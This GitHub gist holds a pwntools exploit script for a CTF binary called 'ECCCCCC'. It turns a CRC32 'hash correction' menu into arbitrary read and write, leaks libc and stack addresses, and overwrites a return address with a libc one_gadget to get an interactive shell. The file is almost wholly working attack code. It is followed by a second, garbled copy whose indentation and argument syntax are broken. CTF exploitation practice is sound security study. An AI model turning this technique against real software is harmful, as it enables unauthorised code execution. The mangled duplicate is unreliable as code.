X3eRo0/gist:85728c257fb8779564e8eeffe9f64ba5

## gistfile1.txt
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import zlib
import pwn
import subprocess

SLEEP_TIME = 0.5

# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('./ECCCCCC')
libc = pwn.ELF("./libc.so.6")
pwn.context.terminal = ["tilix", "-t", "CTFMate", "-a", "session-add-right", "-e"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False

host = pwn.args.HOST or 'ECCCCCC.pwn.so'
port = int(pwn.args.PORT or 65505)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
continue
'''.format(**locals())

io = None


def GetOffsetStdin():
    log_level = pwn.context.log_level
    pwn.context.log_level = 'critical'
    p = pwn.process(exe.path)
    p.sendline(pwn.cyclic(512))
    p.wait()
    time.sleep(2)
    core = p.corefile
    fault = core.fault_addr
    ofst = pwn.cyclic_find(fault & 0xffffffff)
    p.close()
    pwn.context.log_level = log_level
    return ofst


def GetOffsetArgv():
    log_level = pwn.context.log_level
    pwn.context.log_level = 'critical'
    p = pwn.process([exe.path, pwn.cyclic(512)])
    p.wait()
    time.sleep(2)
    core = p.corefile
    fault = core.fault_addr
    ofst = pwn.cyclic_find(fault & 0xffffffff)
    p.close()
    pwn.context.log_level = log_level
    return ofst


io = start()

def RevCRC32(hash):
    # source : https://github.com/theonlypwner/crc32
    v0 = subprocess.check_output(["python", "./crc32.py", "reverse", hex(hash)])
    v0 = bytearray([int(v, 16) for v in v0.split(b"\n")[0][v0.index(b"{")+1:-1].split(b",")])
    return v0

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

def ExOption(v):
    time.sleep(SLEEP_TIME)
    io.sendlineafter(b"Option: ", b"%d" % v)

def SetRegion(addr, len):
    time.sleep(SLEEP_TIME)
    io.sendlineafter(b"Begin: ", b"%x" % addr)
    io.sendlineafter(b"Length: ", b"%d" % len)

def ArbRead(addr):
    ExOption(1)
    SetRegion(addr, 4)
    io.recvuntil(b"hash: ")
    leak = int(io.recvline(), 16)
    return leak

def WriteSingleByte(addr, b):
    val = ArbRead(addr)
    rev = RevCRC32(val)
    rev[0] = b
    newcrc32 = zlib.crc32(rev)
    ExOption(2)
    SetRegion(addr, 4)
    io.sendlineafter(b"Correct hash: ", b"%d" % newcrc32)
    if io.recvline() != b"Succesfully corrected the data!\n":
        pwn.error("Failed to write 0x%x at 0x%x" % (b, addr))

def ArbWrite(addr, data):
    for i in range(len(data)):
        WriteSingleByte(addr+i, data[i])
    return 0


def Leak(addr, size=8):
    if size==8:
        return pwn.u64(RevCRC32(ArbRead(addr)) + RevCRC32(ArbRead(addr + 4)))
    elif size==4:
        return pwn.u32(RevCRC32(ArbRead(addr)))


PUTS_GOT_ADDR = 0x403fc0
libc.address = Leak(PUTS_GOT_ADDR) - libc.symbols['puts']
stack = Leak(libc.symbols.environ)
retaddr = stack - 0x100
pwn.info("Libc    : 0x%x" % libc.address)
pwn.info("Stack   : 0x%x" % stack)
pwn.info("retaddr : 0x%x" % retaddr)
ArbWrite(retaddr, pwn.p64(libc.address + 0xe3b31))
ExOption(0)
io.interactive()
	#!/usr/bin/env python
	# -- coding: utf-8 --

	# this exploit was generated via
	# 1) pwntools
	# 2) ctfmate

	import os
	import time
	import zlib
	import pwn
	import subprocess

	SLEEP_TIME = 0.5

	# Set up pwntools for the correct architecture
	exe = pwn.context.binary = pwn.ELF('./ECCCCCC')
	libc = pwn.ELF("./libc.so.6")
	pwn.context.terminal = ["tilix", "-t", "CTFMate", "-a", "session-add-right", "-e"]
	pwn.context.delete_corefiles = True
	pwn.context.rename_corefiles = False

	host = pwn.args.HOST or 'ECCCCCC.pwn.so'
	port = int(pwn.args.PORT or 65505)


	def local(argv=[], a, *kw):
	'''Execute the target binary locally'''
	if pwn.args.GDB:
	return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, a, *kw)
	else:
	return pwn.process([exe.path] + argv, a, *kw)


	def remote(argv=[], a, *kw):
	'''Connect to the process on the remote host'''
	io = pwn.connect(host, port)
	if pwn.args.GDB:
	pwn.gdb.attach(io, gdbscript=gdbscript)
	return io


	def start(argv=[], a, *kw):
	'''Start the exploit against the target.'''
	if pwn.args.LOCAL:
	return local(argv, a, *kw)
	else:
	return remote(argv, a, *kw)


	gdbscript = '''
	continue
	'''.format(**locals())

	io = None


	def GetOffsetStdin():
	log_level = pwn.context.log_level
	pwn.context.log_level = 'critical'
	p = pwn.process(exe.path)
	p.sendline(pwn.cyclic(512))
	p.wait()
	time.sleep(2)
	core = p.corefile
	fault = core.fault_addr
	ofst = pwn.cyclic_find(fault & 0xffffffff)
	p.close()
	pwn.context.log_level = log_level
	return ofst


	def GetOffsetArgv():
	log_level = pwn.context.log_level
	pwn.context.log_level = 'critical'
	p = pwn.process([exe.path, pwn.cyclic(512)])
	p.wait()
	time.sleep(2)
	core = p.corefile
	fault = core.fault_addr
	ofst = pwn.cyclic_find(fault & 0xffffffff)
	p.close()
	pwn.context.log_level = log_level
	return ofst


	io = start()

	def RevCRC32(hash):
	# source : https://github.com/theonlypwner/crc32
	v0 = subprocess.check_output(["python", "./crc32.py", "reverse", hex(hash)])
	v0 = bytearray([int(v, 16) for v in v0.split(b"\n")[0][v0.index(b"{")+1:-1].split(b",")])
	return v0

	# ===========================================================
	# EXPLOIT GOES HERE
	# ===========================================================

	def ExOption(v):
	time.sleep(SLEEP_TIME)
	io.sendlineafter(b"Option: ", b"%d" % v)

	def SetRegion(addr, len):
	time.sleep(SLEEP_TIME)
	io.sendlineafter(b"Begin: ", b"%x" % addr)
	io.sendlineafter(b"Length: ", b"%d" % len)

	def ArbRead(addr):
	ExOption(1)
	SetRegion(addr, 4)
	io.recvuntil(b"hash: ")
	leak = int(io.recvline(), 16)
	return leak

	def WriteSingleByte(addr, b):
	val = ArbRead(addr)
	rev = RevCRC32(val)
	rev[0] = b
	newcrc32 = zlib.crc32(rev)
	ExOption(2)
	SetRegion(addr, 4)
	io.sendlineafter(b"Correct hash: ", b"%d" % newcrc32)
	if io.recvline() != b"Succesfully corrected the data!\n":
	pwn.error("Failed to write 0x%x at 0x%x" % (b, addr))

	def ArbWrite(addr, data):
	for i in range(len(data)):
	WriteSingleByte(addr+i, data[i])
	return 0


	def Leak(addr, size=8):
	if size==8:
	return pwn.u64(RevCRC32(ArbRead(addr)) + RevCRC32(ArbRead(addr + 4)))
	elif size==4:
	return pwn.u32(RevCRC32(ArbRead(addr)))


	PUTS_GOT_ADDR = 0x403fc0
	libc.address = Leak(PUTS_GOT_ADDR) - libc.symbols['puts']
	stack = Leak(libc.symbols.environ)
	retaddr = stack - 0x100
	pwn.info("Libc : 0x%x" % libc.address)
	pwn.info("Stack : 0x%x" % stack)
	pwn.info("retaddr : 0x%x" % retaddr)
	ArbWrite(retaddr, pwn.p64(libc.address + 0xe3b31))
	ExOption(0)
	io.interactive()